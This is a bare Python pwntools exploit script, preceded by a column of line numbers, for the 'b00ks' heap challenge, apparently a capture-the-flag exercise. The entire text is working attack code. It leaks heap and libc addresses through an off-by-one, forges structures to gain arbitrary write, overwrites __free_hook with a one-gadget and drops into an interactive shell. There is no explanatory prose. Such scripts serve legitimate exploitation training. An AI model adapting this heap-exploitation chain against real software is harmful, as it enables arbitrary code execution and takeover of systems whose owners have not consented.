1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

from pwn import *

 

def create(name_size,content,des_size,content2):

        sla('>','1')

        sla(':',str(name_size))

        sla(':',content)

        sla(':',str(des_size))

        sla(':',content2)

 

def edit(ids,des):

        sla('>','3')

        sla(':',str(ids))

        sla(':',des)

 

def delete(ids):

        sla('>','2')

        sla(':',str(ids))

 

def show():

        sla('>','4')

 

def change_name(name):

        sla('>','5')

        sla(':',name)

 

r=process('./b00ks')

e=ELF('./b00ks')

libc=e.libc

 

sla = lambda x,y : r.sendlineafter(x,y)

ru = lambda x : r.recvuntil(x)

sa = lambda x,y : r.sendafter(x,y)

 

sla(':','A'*0x20)

 

create(0x80,'A'*0x7f,0x80,'A'*0x7f)

create(0x80,'B'*0x7f,0x80,'B'*0x7f)

 

show()

ru('Author: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')

heap=u64(ru('\n').replace('\n','')+'\x00\x00')-0x140

log.info(hex(heap))

 

delete(2)

 

edit(1,'A'*0x50+p64(1)+p64(heap+0x170)+p64(heap+0xb0)+p64(0x80))

 

change_name('A'*0x20)

 

show()

ru('Name: ')

libc_leak=u64(ru('\x7f')+'\x00\x00')-0x3c4b78

oneshot=libc_leak+0x4526a

log.info(hex(libc_leak))

 

edit(1,'A'*0x50+p64(1)+p64(heap+0x170)+p64(libc_leak+libc.symbols['__free_hook'])+p64(0x80))

 

edit(1,p64(oneshot))

delete(1)

r.interactive()